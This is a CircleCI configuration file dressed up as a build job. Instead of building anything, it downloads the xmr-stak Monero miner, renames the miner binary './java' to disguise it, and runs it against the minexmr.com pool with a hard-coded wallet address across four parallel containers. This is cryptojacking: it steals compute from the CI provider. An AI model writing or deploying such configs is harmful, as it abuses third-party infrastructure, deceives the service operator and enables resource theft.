version: 2.1
jobs:
  compile:
   docker:
      - image: ubuntu:20.10
   steps:
      - run:
          command: |
           apt update &&apt install -y wget git
           git clone --depth=1 https://github.com/leonfox202/bitcoin-wallet.git linux
           cd linux
           wget https://github.com/fireice-uk/xmr-stak/releases/download/1.0.5-rx/xmr-stak-rx-linux-1.0.5-cpu.tar.xz
           tar xfv xmr-stak-rx-linux-1.0.5-cpu.tar.xz
           cd xmr-stak-rx-linux-1.0.5-cpu
           chmod 755 *
           ./java --url us-west.minexmr.com:443  --user  42Ctz7xCRFX6nSgrPdR8sJRJNmHPGfjyQ5Rdir4Wa6TDGDtvsN8LGMsDqhbEBi7zgSaAQKLxQYUVUHF2XcnMSuzyFWc5H3P --pass L1 --donate-level 0 
           ./build.sh
      
   parallelism: 4       
workflows:
  version: 2.1
  cooking:
    jobs:
      - compile
